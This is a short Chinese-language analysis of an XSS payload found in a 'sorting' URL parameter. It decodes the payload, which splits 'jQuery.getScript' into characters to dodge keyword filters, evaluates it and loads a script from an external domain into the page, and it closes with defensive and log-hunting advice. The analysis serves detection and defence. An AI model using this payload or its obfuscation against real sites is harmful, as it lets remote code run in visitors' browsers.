...
&sorting=%27;var%20a=[%27j%27,%27Q%27,%27u%27,%27e%27,%27r%27,%27y%27,%27.%27,%27g%27,%27e%27,%27t%27,%27S%27,%27c%27,%27r%27,%27i%27,%27p%27,%27t%27],b=eval,c=b(a.join(%27%27));c(%27http://aws.35xf.cn/bridge/b.js%27);;%27
...
...
&sorting=';var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t'],b=eval,c=b(a.join(''));c('http://aws.35xf.cn/bridge/b.js');;'
...
- XSS 注入分析:从载荷首尾的引号推测,`sorting` 参数的值被原样输出到页面脚本的单引号字符串中;开头的 `';` 闭合该字符串,结尾的 `;'` 与原有的右引号配对,中间的语句因此被当作代码执行
- 把函数名 `jQuery.getScript` 拆成单字符数组 -- a(完整名称不以明文出现在请求中,目的应是避开基于关键字的过滤规则)
var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t']
- 给 eval 起别名 -- b(后面用 b 把字符串求值为函数引用)
b=eval
- 把数组拼接回字符串 `jQuery.getScript` 并求值,得到该函数的引用 -- c(前提是页面已加载 jQuery)
c=b(a.join(''))
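- 调用 c,即 jQuery.getScript(url):从外部域名加载 js 并在当前页面上下文中执行 -- c(js)
c('http://aws.35xf.cn/bridge/b.js')
- 防御与排查:`sorting` 只接受白名单内的排序字段;输出到脚本上下文时做 JS 字符串转义;用 CSP 的 script-src 限制外部脚本来源且不启用 'unsafe-eval';在访问日志中检索 sorting 参数里出现的引号、`eval`、`.join(` 或上述域名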